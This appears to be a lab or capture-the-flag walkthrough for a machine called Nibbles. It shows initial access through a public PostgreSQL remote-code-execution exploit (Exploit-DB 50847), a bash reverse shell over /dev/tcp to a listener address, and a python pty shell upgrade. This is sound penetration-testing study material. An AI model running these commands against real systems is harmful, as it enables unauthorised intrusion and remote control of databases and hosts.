looking for public exploit. [Initial access]

In nmap result, I can see version details of postgreSQL. So, I will search for public exploit related to that.

Found one exploit close to this version.

Google search value

postgresql db 11.3 - 11.9 exploit

PostgreSQL 9.3-11.7 - Remote Code Execution (RCE) (Authenticated)Exploit Database

Running the exploit

Copying the exploit.

searchsploit -m 50847

Making command with the help from the exploit.

python3 50847.py --ip $nibbles --port 5437 --command whoami

Run it.

This worked 😂.

Trying for the shell worked

# start listener in kali linux
sudo rlwrap nc -lnvp 80

# run the exploit again with bash command:
python3 50847.py --ip $nibbles --port 5437 --command 'bash -c "bash -i >& /dev/tcp/192.168.45.242/80 0>&1"'

Worked 😂.

Stabalize the shell.

(command -v python && python -c 'import pty; pty.spawn("/bin/bash");') || (command -v python3 && python3 -c 'import pty; pty.spawn("/bin/bash");')

PreviousNibbles [Easy] [own]Nextprivilege escalation [Got-Find]

Last updated 1 year ago

hashtagRunning the exploit

hashtagTrying for the shell worked

Running the exploit

Trying for the shell worked